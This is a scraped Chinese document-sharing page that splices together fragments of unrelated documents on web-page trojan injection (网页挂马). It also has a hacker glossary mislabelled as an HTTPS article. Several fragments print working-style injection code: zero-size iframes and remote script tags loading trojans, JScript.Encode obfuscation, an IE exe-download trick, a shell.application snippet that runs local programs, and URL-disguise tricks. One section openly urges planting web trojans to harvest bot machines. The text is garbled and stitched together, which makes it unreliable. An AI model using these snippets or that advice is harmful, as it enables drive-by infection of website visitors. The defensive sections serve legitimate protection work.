网页挂马种类

合集下载

网页挂马

网页挂马

网页挂马的检测及防御
• 1 客户端检测防御方式 • 2 网站防御方法
1客户端检测防御方式
• 特征匹配,将网页挂马的脚本按脚本病毒处理进行 检测。但由于网页脚本变形方式、加密方式比起传 统的PE格式病毒更为多样,检测起来也更加困难。 • 主动防御,禁止浏览器安装危险小插件。 • 检查父进程是否为浏览器。 • 及时补漏,网页木马的运行原理是利用IE浏览器的 漏洞,因此用户要开启系统“自动更新”功能,或 者使用其它专业检测工具对系统及应用软件进行实 时漏洞扫描,及时打上最新漏洞补丁,并定期检查 各种应用软件的更新,以杜绝木马利用应用软件的 漏洞进行传播。
javascript脚本挂马
• js挂马是一种利用js脚本文件调用的原理进行 的网页木马隐蔽挂马技术,如:黑客先制作一 个js文件,然后利用js代码调用到挂马的网页。 通常代码如下: <script language=javascript src=http://www.xxx.co m/gm.js></script> /gm.js就是一个js脚本文件, 通过它调用和执行木马的服务端。这些js文件 一般都可以通过工具生成,攻击者只需输入相 关的选项就可以了。
网页挂马
什么是挂马
• 网页挂马有个非常重要的特点,就是不需 要下载安装软件,只要这个网页上有攻击 代码,用浏览器浏览该网页就会导致中毒。 • 网页挂马就是攻击者通过在正常的页面中 (通常是网站的主页)插入一段代码。浏览者 在打开该页面的时候,这段代码被执行, 然后下载并运行某木马的服务器端程序。
几种最主要的挂马技术
URL伪装挂马
• 高级欺骗(),黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级 欺骗技术,当用户访问木马页面时地址栏显示或者 等用户信任地址,其实却打开了被挂马的页面, 从而实现欺骗,示例代码如: <p><a id="qipian" href=""></a></p> <div> <a href="" target="_blank"> <table> <caption> <label for="qipian"> <u style="cursor;pointer;color;blue"> </u> </label> </caption> </table> </a> </div>

课件:注入和网页挂马

课件:注入和网页挂马

• 一:框架挂马 • <iframe src=地址 width=0 height=0></iframe> • 二:js文件挂马 • 首先将以下代码 • document.write("<iframe width='0' height='0' src='地址'></iframe>"); • 保存为xxx.js, • 则JS挂马代码为 • <script language=javascript src=xxx.js></script> • 三:js变形加密 • <SCRIPT language="JScript.Encode" src=/muma.txt></script> • muma.txt可改成任意后缀
• 2.3 网页挂马演示举例
• 2.3.1 图片伪装演示 • <html> • 1 <iframe src="欺骗网页.html" height=0 width=0></iframe> • 2 <img src="m12.jpg" /> • </html> • 2处:正常的网页内容 • 1处:在iframe标签中,我们嵌入了一个欺骗网页,这个网页
• 八:图片伪装
• <html> • <iframe src="网马地址" height=0 width=0></iframe> • <img src="图片地址"></img>
• </html> • 九:伪装调用:

HTTPS那些协议:TLS,SSL,SNI,ALPN,NPN

HTTPS那些协议:TLS,SSL,SNI,ALPN,NPN

HTTPS那些协议:TLS,SSL,SNI,ALPN,NPN1、肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。

2、木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。

有很多黑客就是热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。

3.网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。

4、挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。

5、后门:这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。

这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是入侵者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。

通常大多数的特洛伊木马(Trojan Horse)程序都可以被入侵者用语制作后门(BackDoor)6、rootkit:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDO WS下的system或者管理员权限)访问权限的工具。

通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。

然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,r ootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。

网站常见三种漏洞攻击及防范方法[试题]

网站常见三种漏洞攻击及防范方法[试题]

国内外黑客组织或者个人为牟取利益窃取和篡改网络信息,已成为不争的事实,在不断给单位和个人造成经济损失的同时,我们也应该注意到这些威胁大多是基于Web网站发起的攻击,在给我们造成不可挽回的损失前,我们有必要给大家介绍几种常见的网站漏洞,以及这些漏洞的防范方法,目的是帮助广大网站管理者理清安全防范思绪,找到当前的防范重点,最大程度地避免或减少威胁带来的损失。

1、SQL语句漏洞也就是SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。

有效防范手段:对于SQL注入问题的一般处理方法是账户最小权限原则。

以下几种方法推荐使用:对用户输入信息进行必要检查对一些特殊字符进行转换或者过滤使用强数据类型限制用户输入的长度需要注意:这些检查要放在server运行,client提交的任何东西都是不可信的。

使用存储过程,如果一定要使用SQL语句,那么请用标准的方式组建SQL 语句。

比如可以利用parameters对象,避免用字符串直接拼SQL命令。

当SQL 运行出错时,不要把数据库返回的错误信息全部显示给用户,错误信息经常会透露一些数据库设计的细节。

2、网站挂马挂马就是在别人电脑里面(或是网站服务器)里植入木马程序,以盗取一些信息或者控制被挂马的电脑做一些不法的勾当(如攻击网站,传播病毒,删除资料等)。

网页挂马就是在网页的源代码中加入一些代码,利用漏洞实现自动下载木马到机器里。

网站挂马的形式可分为框架挂马、数据库挂马、后台挂马、服务器挂马以及其他形式的挂马方式。

有效防范手段:要防止网站被挂马,可以采取禁止写入和目录禁止执行的功能,这两项功能相组合,就可以有效地防止 ASP木马。

此外,网站管理员通过FTP上传某些数据,维护网页时,尽量不安装asp的上传程序。

网站挂马

网站挂马

挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。

挂马方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL,比如下面的挂马代码:<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>这里通过将IFrame的width与height设置为0,使得嵌入的网马URL在网页上不可见。

<script src=http://%68%68%6A%32***%63%6E></script>这里Script里的URL是经过URL encode编码的。

通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。

除了这两种常见的挂马方式外,还有如下几种:1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。

2、利用网页跳转、弹出新窗口等方式进行挂马。

3、利用Flash等媒体封装的方式进行挂马。

4、在CSS(层叠样式表)里可以执行JavaScript的浏览器中进行挂马。

挂马常见类型常见的几种类型如下:1、数据库挂马攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中,如果网站页面使用到这些字段的值,并且没做适当的过滤,就有可能导致用户访问该网站的页面时执行攻击者注入的代码。

2、文件挂马攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。

3、ARP挂马在与目标站点同一局域网的情况下,攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗,并将挂马代码注入到用户请求的响应页面上,从而达到隐蔽的挂马目的。

网页挂马之实战详解

网页挂马之实战详解

网页挂马之实战详解不论是那一种帮凶,黑客都希望能在被黑者不怀疑、杀毒软件抓不到的情况下,顺利将木马保存到被黑电脑中然后运行,经过多年的演变与发展,目前有经验的黑客最常使用的方法就是利用木马网页…也就是说黑客会先针对某个漏洞 (通常是 Windows 或 IE 的漏洞) 设计出一个特殊的网页 (也就是木马网页),当被黑者浏览这个网页,就会利用该漏洞无声无息的趁机将木马下载到被黑电脑中然后运行 (若被黑电脑已修补该漏洞,此方法当然就无效)。

一般而言黑客想要利用漏洞来进行黑客任务,几乎都必须自己写工具程序才行,不过在黑客的世界中永远有奉献出自己心力的慈善家,因此网络上就有一些针对某些漏洞而设计的木马生成器,让许多黑客 (特别是初学者黑客) 可以不必学习高深的编程就能轻易的利用这类工具来进行黑客任务,在本问题中我们就是要详细讨论黑客如何利用这类工具来进行工作。

由于这类工具是帮助真正的木马植入被黑电脑中与运行,因此应该称为木马帮凶,而不是真正的木马,因此严格来说它应该是木马帮凶生成器,而不是木马生成器,像 Sub7 editserver.exe 或 Optix PRO Builder.exe 才算是名符其实的木马生成器。

◎木马帮凶生成器的问题与盲区可能有读者会认为:既然有现成的工具,那要设计一个木马网页就不是难事! 在网络随便查找就有一大堆,的确没错,虽然在搜索网站输入网马生成器、木马生成器就可找到很多 (大多是在我国内地),但是有经验黑客并不会因此而高兴,因为这些木马帮凶生成器的问题很多,并非找到后下载就能顺利使用,主要有下列问题:.虽然在查找网站中有找到,但单击后该网页已经不见了,当然也就不可能下载木马帮凶生成器,这种情况很常见,只好再试下一个查找到的项目。

.有些木马生成器是利用一年前或是更久之前的漏洞 (Windows 系统或 IE 的漏洞) 设计的,就算下载后可以正常使用,但对于已修补该漏洞的电脑当然就无效,也就是说年代愈久,木马生成器愈没有利用的价值 (对许多电脑可能都无效),因此这类木马查找到一大堆也几乎是废物。

网页挂马调查报告

网页挂马调查报告

网页挂马调查报告网页被挂马是最让站长头痛的一件事情,因为这说明已经有骇客拥有了你的网站的操作权限,面对这种情况,首先如果是虚拟主机用户应当积极与服务商联系运行查杀工具,彻底清除恶意代码和后门;而如果你拥有自己的主机,则应当积极检查程序是否有漏洞并立即升级到最新的补丁。

所以作为站长就应当最早的发现网页被挂马的代码,下面是一些比较常见的挂马方式:常见挂马方式这种挂马方式比较多,主要是以下这种格式:“<iframe src=木马地址 width=0 height=0></iframe>”,width=0和height=0是为了隐藏框架。

与Iframe挂马平级,也比较常见,主要是以下这种格式:"<script src=木马地址></script>",当然也可以演变为Iframe挂马,"<script>document.write('<iframe src=木马地址 width=0 height=0></iframe>')</script>"。

附上一张石头博客被Script挂马的截图只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。

这种挂马方式与Script挂马差不多,惟一不同的就是使用了Encode隐藏了源JS的后缀,但同样可以达到执行代码的目的,主要是以下这种格式:“<script language='JScript.Encode' src=/a.txt></script>”虽然表面上看只是引用了一个txt文件,但是依然可以顺利执行其中的代码。

什么是网马,怎么制作网马,怎么挂马

什么是网马,怎么制作网马,怎么挂马

首先说什么是网马。

网马有什么用呢?先说下有什么用。

例如,大家想玩鸽子,想找肉鸡。

想找很多很多的肉鸡。

当然方法很多,例如135抓鸡什么的。

但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串 ...首先说什么是网马。

网马有什么用呢?先说下有什么用。

例如,大家想玩鸽子,想找肉鸡。

想找很多很多的肉鸡。

当然方法很多,例如135抓鸡什么的。

但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串一串的。

我自己操作为啥老半天就扫不到呢?因为这漏洞出来很久了,再者,天天有人扫肉鸡。

当然肉鸡就少了,也很难找到。

还有,大家扫描肉鸡的方法可能也有点不对。

综合起来,利用这些漏洞找肉鸡的效率很低下。

那么用网马呢,网马就是挂马。

你想下。

要是一个网站,一天有1万个人访问,一万个人中哪怕几率降低到%1的中马率。

一天也有100个人中马成为你的肉鸡啊。

而且,你挂上网马后关机睡觉肉鸡也刷刷刷的上来。

所以网马很爽,所以也比自己拿个软件扫描漏洞来劲。

上面说了网马的作用。

综合叙述下,就是快捷,方便。

更快,更高,更强的达到散播木马的途径。

然后,大家应该明什么是网马了吧?对的,网马简单的说下,就是网页木马。

当别人访问一个网页就可能从这个网页自动下载木马,并且在你后台悄悄运行。

这就是网马。

简单的这么理解,当然我们学黑客知识的肯定对这些东西不能简单理解了事了。

但是,我们只是入门的小菜鸟,所以再深入了解一点点就行了。

深入说下。

什么是网马?网马就是利用网页代码操作win的漏洞。

首先,我们得明白什么是网页。

为什么我们打开一个网站,这个网站会显示出这些图片。

就如你现在看的这篇帖子,为什么背景是这个颜色,为什么字体有大有小,为什么网页各处的颜色不同。

然后构成了这样一个网页。

怎么构成的?难道就是简简单单的几张图片就构成了我们现在看到的这个网页页面?错了。

是图片+文字+代码。

这是一个网页构成的基本元素。

但是,代码是必须要的。

这里提到了代码。

例如一段网页由设计者设计,图片应该放这里,文字应该按照这样排列。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

国内资深安全专家详谈网页木马诚信网安--子明【 专家特稿】当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,反查杀手段不断升级,新的病毒层出不穷,形式也越来越多样化,为了躲避查杀,病毒自身的隐蔽性越来越高,针对反病毒软件对传统的病毒传播途径的监控能力提高,造成病毒传播困难的问题,越来越多的病毒,利用多数反病毒软件产品对恶意脚本监控能力的缺陷,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来传播。

一、什么是网页木马网页木马是利用网页来进行破坏的病毒,它包含在恶意网页之中,使用脚本语言编写恶意代码,依靠系统的漏洞,如IE浏览器存在的漏洞来实现病毒的传播。

当用户登陆了包含网页病毒的恶意网站时,网页木马便被激活,受影响的系统一旦感染网页病毒,就会遭到破坏,轻则浏览器首页被修改,标题改变,系统自动弹出广告,重则被装上木马,感染病毒,使用户无法进行正常的使用。

甚至会引起系统崩溃,敏感信息丢失等严重后果。

由于脚本语言易于掌握,所以网页木马非常容易编写和修改,造成很难提取特征值,增加了杀毒软件查杀以及用户预防的困难。

目前的网页木马都是利用脚本语言、ActiveX、WSH等来实现对客户端计算机的远程操作,如改写注册表,添加、删除、更改文件夹等操作。

网页病毒可以以此来达到传播的目的。

1.利用WSH(Windows Scripting Host Object R eference)等系统控件WSH,是“Windows Scripting Host”的简称,可以直译为“Windows 脚本宿主”。

在Windows系统中会默认安装,它是内嵌于Windows 操作系统中的脚本语言工作环境。

Windows Scripting Host 这个概念最早出现于 Windows 98 操作系统。

微软在研发 Windows 98 时,为了实现多类脚本文件在Windows 界面或Dos 命令提示符下的直接运行,就在系统内植入了一个基于32 位Windows 平台、并独立于语言的脚本运行环境,并将其命名为“Windows Scripting Host”。

WSH 架构于ActiveX 之上,通过充当 ActiveX 的脚本引擎控制器,WSH 为 Windows 用户充分利用威力强大的脚本指令语言扫清了障碍。

WSH也有它的不足之处,任何事物都有两面性,WSH 也不例外。

WSH 的优点在于它使用户可以充分利用脚本来实现计算机工作的自动化;但也正是它的这一特点,使系统存在了安全隐患。

计算机病毒制造者用脚本语言来编制病毒,并利用WSH 的支持功能,让这些隐藏着病毒的脚本在网络中广为传播。

借助WSH的缺陷,通过JAVAScript,VBScript,ActiveX等网页脚本语言,可以改动受影响系统的注册表,利用服务器端脚本程序如:ASP,PHP等来记录访问网页者的相关信息,浏览之后,系统目录被完全共享;IP地址、访问时间、操作系统名称会被网页木马所记录,造成敏感信息的泄露。

2.Microsoft Internet Explorer等浏览器存在漏洞3.脚本语言用JAVA编制的脚本语言主要是Java Applet和Java Script。

Applet是Java编写的小应用程序,不能独立运行,需要嵌入HTML文件,遵循标准,在支持Java的浏览器(如Microsoft Internet Explorer) 上运行,是Java一个重要的应用分支,它改变了传统网页呆板的界面,在WWW网页(Home Page / Pages)设计中加入了动画、影像、音乐等元素。

JavaScript是一种基于对象(Object)和事件驱动(Event Driven)并具有安全性能的脚本语言。

使用它的目的是与HTML超文本标记语言、与Web客户交互作用。

从而可以开发客户端的应用程序等。

它是通过嵌入或文件引用在标准的HTML语言中实现的。

它的出现弥补了HTML语言的缺陷,它是Java与HTML折衷的选择,具有基于对象、简单、安全、动态、跨平台性等特性。

ActiveX是Microsoft提出的一组使用COM(Component Object Model,部件对象模型)使得软件部件在网络环境中进行交互的技术。

它与具体的编程语言无关。

作为针对Internet应用开发的技术,ActiveX 被广泛应用于WEB服务器以及客户端的各个方面。

同时,ActiveX技术也被用于方便地创建普通的桌面应用程序。

在Applet中可以使用 ActiveX技术,如直接嵌入ActiveX控制,或者以ActiveX技术为桥梁,将其它开发商提供的多种语言的程序对象集成到Java中。

与Java的字节码技术相比,ActiveX提供了“代码签名”(Code Signing)技术保证其安全性。

造成网页病毒传播和形成的主要原因,是因为Windows操作系统以及Microsoft Internet Explorer等浏览器存在漏洞。

二、网页木马的攻击原理网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。

打开一个网页,IE浏览器不会自动下载程序和运行程序,这是因为,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面列举一些IE浏览器等存在的漏洞来分别说明为什么利用网页木马可以下载程序和运行程序。

1.下载可执行文件.index里有一个代码漏洞<LINK href="ray.exe" rel=stylesheet type=text/css>,IE会把可执行文件误认为CSS样式表而下载到IE的临时文件目录.也可以利用<SCRIPT LANGUAGE="icyfoxlovelace" src="/1.exe"></SCRIPT>这段代码,把这段代码插入到网页源代码的</BODY>…</BODY>之间,运行后就会发现在IE的临时目录Temporary Internet Files下,已经下载了1.exe这个病毒文件。

2.自动运行程序<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=newActiveXObject("shell.application");space("c:\\Windows\\").items().i t em("Notepad.exe").invokeverb(); </SCRIPT>把这段代码插入到网页源代码的</BODY>…</BODY>之间,然后用IE打开该网页,这段代码可以在IE中自动打开记事本。

这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,就可以用它自动运行本地电脑上的任意程序。

通过以上的例子可以看出,利用IE的漏洞,在网页中插入相关的代码,IE完全可以自动下载和运行程序。

三、可能被网页木马利用的漏洞1.利用URL格式漏洞此类网页木马是利用URL格式漏洞来欺骗用户。

构造一个看似JPG格式的文件诱惑用户下载,但事实上用户下载的却是一个EXE文件。

此类攻击,具有相当的隐蔽性,利用URL欺骗的方法有很多种,比如起个具有诱惑性的网站名称或使用易混的字母数字掉包进行银行网络钓鱼,还有漏洞百出的“%30%50”之类的Unicode编码等等,现在列举比较常见的几种方法:(1).@标志过滤用户名的解析本来@标志是E-mail地址的用户名与主机的分隔符,但在URL中同样适用,而且功能如出一辙。

HTTP (超文本传输协议)规定了URL的完整格式是“Http://Name:Password@IP地址或主机名”,其中的“IP地址或主机名”是必填项。

@标志与其前面的“Name:Password”,意为“用户名:密码”,属于可选项。

也就是说,在URL中真正起解析作用的网址是从@标志后面开始的,这就是欺骗原理。

比如用户访问“@/Hui GeZi_Server.exe”,从表面上看,这是新浪网提供的一个链接,用户会认为这是一个无害的链接,而点击,而实际上“”只是个写成新浪网址形式的用户名(此处的密码为空),因为后面有@标志。

而真正链接的网址却是“/HuiGeZi_Server.exe” 也就是说这个发来的URL地址其实完全等同于“Http://www /HuiGeZi_Server.exe,而与前面的用户名毫无关系,只是迷惑性可就大大提高了。

即使没有这个用户名,也完全不影响浏览器对URL的解析。

(2).十进制的IP地址常见的IP地址包括四个字节,一般表示形式为“xxx.xxx.xxx.xxx”(x表示一个十进制数码),例如“61.135.132.12”。

因为数字IP地址较长,且过于抽象、难以记忆,所以采用域名服务DNS来与之对应。

在浏览器地址栏中输入“”与“Http://61.135.132.12”的结果完全一样,都是访问搜狐网站,因为61.135.132.12就是搜狐域名的IP地址。

不过,用Http://1032291340访问的话,仍然可以打开搜狐网站,这是因为,四位点分十进制形式的IP地址“61.135.132.12”代表一组32位二进制数码,如果合在一起再转换成一个十进制数的话,答案就是1032291340。

转换方法,就是数制的按权展开:12×2560+132×2561+135×2562+61×2563=12+33792+8847360+1023410176=1032291340(基数为256,即28)。

在上文的例子中提到了“/HuiGeZi_Server.exe”。

这种字母域名有时还能被用户识破,而在把它对应的IP地址(假设为“61.135.132.13”)换算成一个十进制数后,结果是1032291341,再结合@标志过滤用户的解析,就会变成@1032291341这样的地址,这样就更加隐蔽了。

相关文档
最新文档